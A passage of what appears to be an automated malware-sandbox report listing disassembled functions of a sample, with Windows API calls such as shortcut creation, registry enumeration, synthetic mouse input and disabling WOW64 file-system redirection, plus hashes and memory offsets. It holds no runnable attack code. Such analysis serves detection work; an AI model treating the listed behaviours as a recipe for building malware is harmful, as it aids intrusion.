                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearCopy$AllocInitString
                                                              • String ID:
                                                              • API String ID: 3859894641-0
                                                              • Opcode ID: bb08c6eb4a94d8d82dd79bb6d71a711c0a925df171cdd6155ec1ceece4fab601
                                                              • Instruction ID: 2ff3f190b07f465485c6ceeaa240ea08fc8f059890d7f6d21b93f32d9668b88b
                                                              • Opcode Fuzzy Hash: bb08c6eb4a94d8d82dd79bb6d71a711c0a925df171cdd6155ec1ceece4fab601
                                                              • Instruction Fuzzy Hash: 2B51D635640310AFCF24AB659885BAFB3A4EF55310F34844BE906DF296EB709C48DB56
                                                              Function 00CC6DE8 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 00CC6E36
                                                              • CoInitialize.OLE32(00000000), ref: 00CC6F93
                                                              • CoCreateInstance.OLE32(00CF0CC4,00000000,00000001,00CF0B34,?), ref: 00CC6FAA
                                                              • CoUninitialize.OLE32 ref: 00CC722E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                              • String ID: .lnk
                                                              • API String ID: 886957087-24824748
                                                              • Opcode ID: b3d060bd3b37fe50ede130c3cab19d7869c13941fcb666c9b02365241d0cf9dc
                                                              • Instruction ID: 19ca5225b9086274c69361b9b3b6d7ea746ae0ab342046830b0944c659eaaf83
                                                              • Opcode Fuzzy Hash: b3d060bd3b37fe50ede130c3cab19d7869c13941fcb666c9b02365241d0cf9dc
                                                              • Instruction Fuzzy Hash: 67D16775208201AFC304EF64C881E6BB7E8FF98704F40496DF5959B2A2DB30ED49CB92
                                                              Function 00CC10AB Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 00CC10C8
                                                              • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00CC1103
                                                              • EnterCriticalSection.KERNEL32(?), ref: 00CC111F
                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00CC1198
                                                              • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00CC11AF
                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00CC11DD
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                              • String ID:
                                                              • API String ID: 3368777196-0
                                                              • Opcode ID: c7f8f1af5ccbff7d4a39f087d12738d23970abe444cb8d8e6d2df47240b803b7
                                                              • Instruction ID: 2cf130ca3ce601e7622f23dcff6627fe062ea4662539a5faab367bd0535780f7
                                                              • Opcode Fuzzy Hash: c7f8f1af5ccbff7d4a39f087d12738d23970abe444cb8d8e6d2df47240b803b7
                                                              • Instruction Fuzzy Hash: 43414871900205EBDF14AF55DC85AAEB7B8FF45310B1880A9EE04AE296DB34DE51DBA0
                                                              Function 00CE8B3A Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00CAFB8F,00000000,?,?,00000000,?,00C939BC,00000004,00000000,00000000), ref: 00CE8BAB
                                                              • EnableWindow.USER32(?,00000000), ref: 00CE8BD1
                                                              • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00CE8C30
                                                              • ShowWindow.USER32(?,00000004), ref: 00CE8C44
                                                              • EnableWindow.USER32(?,00000001), ref: 00CE8C6A
                                                              • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00CE8C8E
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Window$Show$Enable$MessageSend
                                                              • String ID:
                                                              • API String ID: 642888154-0
                                                              • Opcode ID: 8ba789701dd0817b402ff6208adf70035c5b69bc28dfa1f38679acda8ae15b66
                                                              • Instruction ID: a4d574a2d279fd48974233b5564e409dbd1c60328114770888c3269ba74bc0c3
                                                              • Opcode Fuzzy Hash: 8ba789701dd0817b402ff6208adf70035c5b69bc28dfa1f38679acda8ae15b66
                                                              • Instruction Fuzzy Hash: FC416674601284BFDB25CF25CC89BA57BE1FB46314F1841A9F51D8F2A2CB31A949CF60
                                                              Function 00CD2C37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetForegroundWindow.USER32(?,?,00000000), ref: 00CD2C45
                                                                • Part of subcall function 00CCEE49: GetWindowRect.USER32(?,?), ref: 00CCEE61
                                                              • GetDesktopWindow.USER32 ref: 00CD2C6F
                                                              • GetWindowRect.USER32(00000000), ref: 00CD2C76
                                                              • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00CD2CB2
                                                              • GetCursorPos.USER32(?), ref: 00CD2CDE
                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00CD2D3C
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                              • String ID:
                                                              • API String ID: 2387181109-0
                                                              • Opcode ID: 33a3b3abcae5b4510ddd69f4a6115d38a7f566019e0c9d285327ae9edcac6e4c
                                                              • Instruction ID: d410c82f1a3f09c1ac400215bd18c02c5c1072b97d7ae1bd08b3c332f2068fa4
                                                              • Opcode Fuzzy Hash: 33a3b3abcae5b4510ddd69f4a6115d38a7f566019e0c9d285327ae9edcac6e4c
                                                              • Instruction Fuzzy Hash: 5331F072505355ABD720DF18C848F9EB7A9FFC4354F00091AF9959B280CB30EA44CB92
                                                              Function 00CC6178 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00C5557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C55558,?,?,00C94B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00C5559E
                                                              • _wcslen.LIBCMT ref: 00CC61D5
                                                              • CoInitialize.OLE32(00000000), ref: 00CC62EF
                                                              • CoCreateInstance.OLE32(00CF0CC4,00000000,00000001,00CF0B34,?), ref: 00CC6308
                                                              • CoUninitialize.OLE32 ref: 00CC6326
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                              • String ID: .lnk
                                                              • API String ID: 3172280962-24824748
                                                              • Opcode ID: 914ffc7aa9b984c63ced1e71fdc7b9caed8765741317e93c0f7917f70b065e24
                                                              • Instruction ID: ed8d571e26ee034de29444832ab18f5eac931408b1bb59a56d2b9c624fb018cb
                                                              • Opcode Fuzzy Hash: 914ffc7aa9b984c63ced1e71fdc7b9caed8765741317e93c0f7917f70b065e24
                                                              • Instruction Fuzzy Hash: 0ED121756042019FCB14DF24C584E2ABBF5EF89714F14889DF89A9B361CB31ED89CB92
                                                              Function 00CB2104 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CB210F
                                                              • UnloadUserProfile.USERENV(?,?), ref: 00CB211B
                                                              • CloseHandle.KERNEL32(?), ref: 00CB2124
                                                              • CloseHandle.KERNEL32(?), ref: 00CB212C
                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00CB2135
                                                              • HeapFree.KERNEL32(00000000), ref: 00CB213C
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                              • String ID:
                                                              • API String ID: 146765662-0
                                                              • Opcode ID: 9db976a751e35a514a6cc80aee952e2e800b64ad0950e5039622a1de89a69ffd
                                                              • Instruction ID: 818afa427a5783bf353a01b796da8e441c5f44a00172c51e3764ff58246105fb
                                                              • Opcode Fuzzy Hash: 9db976a751e35a514a6cc80aee952e2e800b64ad0950e5039622a1de89a69ffd
                                                              • Instruction Fuzzy Hash: C1E0E576004241BFDB015FA1ED4CB0EBF39FF49332B104220F2268A070CB329420DB50
                                                              Function 00CBCD90 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00C54154: _wcslen.LIBCMT ref: 00C54159
                                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00CBCEAE
                                                              • _wcslen.LIBCMT ref: 00CBCEF5
                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00CBCF5C
                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00CBCF8A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$Info_wcslen$Default
                                                              • String ID: 0
                                                              • API String ID: 1227352736-4108050209
                                                              • Opcode ID: 4a117e3f7628d699d21030f22e795b80fda424e951cea2e533ae671958ad1e31
                                                              • Instruction ID: bafade66855354d0abe5622a62bb1f86860776d8c2c3802f5be6bdb4866555ee
                                                              • Opcode Fuzzy Hash: 4a117e3f7628d699d21030f22e795b80fda424e951cea2e533ae671958ad1e31
                                                              • Instruction Fuzzy Hash: 2551BF71604300AFD7149FA8C8C5BBBBBE9AF99314F040A6DF9A5D72A0D770CA44DB52
                                                              Function 00CE46DB Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CE4794
                                                              • IsMenu.USER32(?), ref: 00CE47A9
                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00CE47F1
                                                              • DrawMenuBar.USER32 ref: 00CE4804
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$DrawInfoInsert
                                                              • String ID: 0
                                                              • API String ID: 3076010158-4108050209
                                                              • Opcode ID: 5423272c35c96b464c1d4fde8bb08739132ba88f6a9956ff6d37a4ba8d87dfb1
                                                              • Instruction ID: a2a97e18ccc0791c5fdb1b5afbe93ba5f4ceee36776d773568446a629560b033
                                                              • Opcode Fuzzy Hash: 5423272c35c96b464c1d4fde8bb08739132ba88f6a9956ff6d37a4ba8d87dfb1
                                                              • Instruction Fuzzy Hash: B9414A75A01289EFEB24CF52D884AAABBB5FF49315F044129F9159B390C730EE50CFA0
                                                              Function 00CB2672 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00C5B25F: _wcslen.LIBCMT ref: 00C5B269
                                                                • Part of subcall function 00CB4536: GetClassNameW.USER32(?,?,000000FF), ref: 00CB4559
                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00CB26F6
                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00CB2709
                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 00CB2739
                                                                • Part of subcall function 00C584B7: _wcslen.LIBCMT ref: 00C584CA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$_wcslen$ClassName
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 2081771294-1403004172
                                                              • Opcode ID: 5b9e17f8f3b395bb2c042963bbca73b9840ddb18e50809b50743e2129a2a93c8
                                                              • Instruction ID: ce6d2923a70cb9950b4ab26b2a1fa5ffe4f765dfd0164132411b88e13278e0d0
                                                              • Opcode Fuzzy Hash: 5b9e17f8f3b395bb2c042963bbca73b9840ddb18e50809b50743e2129a2a93c8
                                                              • Instruction Fuzzy Hash: 4B21F175900148BFDB14ABA4DC86DFFBBB8DF45760F104119F822AB1E5CF384E4AA624
                                                              Function 00C750FD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00C750AE,?,?,00C7504E,?,00D198D8,0000000C,00C751A5,?,00000002), ref: 00C7511D
                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C75130
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00C750AE,?,?,00C7504E,?,00D198D8,0000000C,00C751A5,?,00000002,00000000), ref: 00C75153
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: 341f1f29a10bdbf9e5728e4e4743838617fbfb66df2f05e7120f2da498136937
                                                              • Instruction ID: cac0b672d4d8baaae88f3d20464dc893bbeaab254d8a67d6d97fca23ff7046f7
                                                              • Opcode Fuzzy Hash: 341f1f29a10bdbf9e5728e4e4743838617fbfb66df2f05e7120f2da498136937
                                                              • Instruction Fuzzy Hash: 4DF04F31A00208BBDB119B94DC49BADBBB5EF04752F454069F90AA6260CB719E40DA91
                                                              Function 00C56332 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C5637F,?,?,00C560AA,?,00000001,?,?,00000000), ref: 00C5633E
                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C56350
                                                              • FreeLibrary.KERNEL32(00000000,?,?,00C5637F,?,?,00C560AA,?,00000001,?,?,00000000), ref: 00C56362
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadProc
                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                              • API String ID: 145871493-3689287502
                                                              • Opcode ID: 4d6a09df7a8c82a37bfdf488c469bd3d64eefe1dd1731817a6b667eacf47e6f8
                                                              • Instruction ID: 9167d6dd74dd7e86832483e915241c5b1e2239e330bb1e8f0e87527972b14cf6
                                                              • Opcode Fuzzy Hash: 4d6a09df7a8c82a37bfdf488c469bd3d64eefe1dd1731817a6b667eacf47e6f8
                                                              • Instruction Fuzzy Hash: 3FE0CD36701B2217925117157C08B6E67189F91F737450015FD12D7110DF60CD45C1B4
                                                              Function 00C562FB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C954C3,?,?,00C560AA,?,00000001,?,?,00000000), ref: 00C56304
                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C56316
                                                              • FreeLibrary.KERNEL32(00000000,?,?,00C954C3,?,?,00C560AA,?,00000001,?,?,00000000), ref: 00C56329
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadProc
                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                              • API String ID: 145871493-1355242751
                                                              • Opcode ID: 97787b5a1ec6345266b3e29a096dc5c603d5e5b1cb02efcc1411ee3f64b7c106
                                                              • Instruction ID: 6ed9aef9330e7ae978bc023ebf4a2db6b51e6da72a373625c48172402f58329c
                                                              • Opcode Fuzzy Hash: 97787b5a1ec6345266b3e29a096dc5c603d5e5b1cb02efcc1411ee3f64b7c106
                                                              • Instruction Fuzzy Hash: C1D0123A6425616752222725BC18B8E7E25DE85B723850169FC12AB238CF61CE4585A4
                                                              Function 00CDACE6 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcessId.KERNEL32 ref: 00CDAD86
                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00CDAD94
                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00CDADC7
                                                              • CloseHandle.KERNEL32(?), ref: 00CDAF9C
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Process$CloseCountersCurrentHandleOpen
                                                              • String ID:
                                                              • API String ID: 3488606520-0
                                                              • Opcode ID: f4ba873587e68b6eb727b84a7fe72f127f6a0c4ce3ca32467da4614effcaa7a3
                                                              • Instruction ID: 11f318fdb1a61a4e0db2426ca2924f402cbf84d4761c8459c2a5a828233492f9
                                                              • Opcode Fuzzy Hash: f4ba873587e68b6eb727b84a7fe72f127f6a0c4ce3ca32467da4614effcaa7a3
                                                              • Instruction Fuzzy Hash: 29A1BFB5604300AFD724DF24C886B2AB7E5AF44714F14885EFA99DB392DB70ED44CB86
                                                              Function 00CDC328 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00C5B25F: _wcslen.LIBCMT ref: 00C5B269
                                                                • Part of subcall function 00CDD2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CDC00D,?,?), ref: 00CDD314
                                                                • Part of subcall function 00CDD2F7: _wcslen.LIBCMT ref: 00CDD350
                                                                • Part of subcall function 00CDD2F7: _wcslen.LIBCMT ref: 00CDD3C7
                                                                • Part of subcall function 00CDD2F7: _wcslen.LIBCMT ref: 00CDD3FD
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CDC404
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CDC45F
                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00CDC4C2
                                                              • RegCloseKey.ADVAPI32(?,?), ref: 00CDC505
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00CDC512
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
